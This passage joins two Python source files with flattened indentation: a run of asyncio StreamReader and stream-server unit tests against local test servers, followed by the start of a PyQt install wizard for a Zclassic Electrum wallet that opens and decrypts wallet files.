conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
try:
reader, writer = self.loop.run_until_complete(open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(30), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(1024), loop=self.loop)
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(-1), loop=self.loop)
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=0, loop=self.loop)
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=-1, loop=self.loop)
def test_read_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'chunk1 ')
read_task = asyncio.Task(stream.readline(), loop=self.loop)
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in StreamReader's buffer
# before the event loop is run.
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. StreamReaders are fed with data after
# their 'readline' methods are called.
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
# check strictness of the limit
stream = asyncio.StreamReader(limit=7, loop=self.loop)
stream.feed_data(b'1234567\n')
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'1234567\n', line)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678\n')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
stream = asyncio.StreamReader(loop=self.loop)
with self.assertRaisesRegex(ValueError, 'Separator should be'):
self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYaa')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYa')
stream.feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'XXX')
stream.feed_data(b'a')
stream.feed_data(b'a')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some dataAA')
stream.feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
def test_readuntil_limit_found_sep(self):
stream = asyncio.StreamReader(loop=self.loop, limit=3)
stream.feed_data(b'some dataAA')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'not found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAA', stream._buffer)
stream.feed_data(b'A')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'is found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
@asyncio.coroutine
def set_err():
stream.set_exception(ValueError())
t1 = asyncio.Task(stream.readline(), loop=self.loop)
t2 = asyncio.Task(set_err(), loop=self.loop)
self.loop.run_until_complete(asyncio.wait([t1, t2], loop=self.loop))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.StreamReader(loop=self.loop)
t = asyncio.Task(stream.readline(), loop=self.loop)
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
def start(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock,
loop=self.loop))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1],
loop=self.loop))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
return msgback
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
addr = server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
addr = server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
@support.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
reader, writer = await asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
return msgback
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# StreamReader's limit so that twice it is less than the size
# of the data writter. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
reader = asyncio.StreamReader(loop=self.loop, limit=1)
protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(*args,
pass_fds={wfd},
loop=self.loop)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(reader.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.StreamReader()
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = mock.Mock()
protocol = asyncio.StreamReaderProtocol(reader)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
q = queue.Queue()
def server():
# Runs in a separate thread.
sock = socket.socket()
with sock:
sock.bind(('localhost', 0))
sock.listen(1)
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
reader, writer = await asyncio.open_connection(
host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
await writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
def test___repr__(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.StreamReader(loop=self.loop, limit=123)
self.assertEqual("<StreamReader limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
self.assertEqual("<StreamReader eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'data')
self.assertEqual("<StreamReader 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.StreamReader(loop=self.loop)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<StreamReader exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
r"<StreamReader waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__transport(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<StreamReader transport=<Transport>>", repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
if __name__ == '__main__':
unittest.main()
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Zclassic Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Zclassic Electrum Wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
else:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
# FIXME if we get here because of mistyped passphrase
# then that passphrase gets "cached"
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet()
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
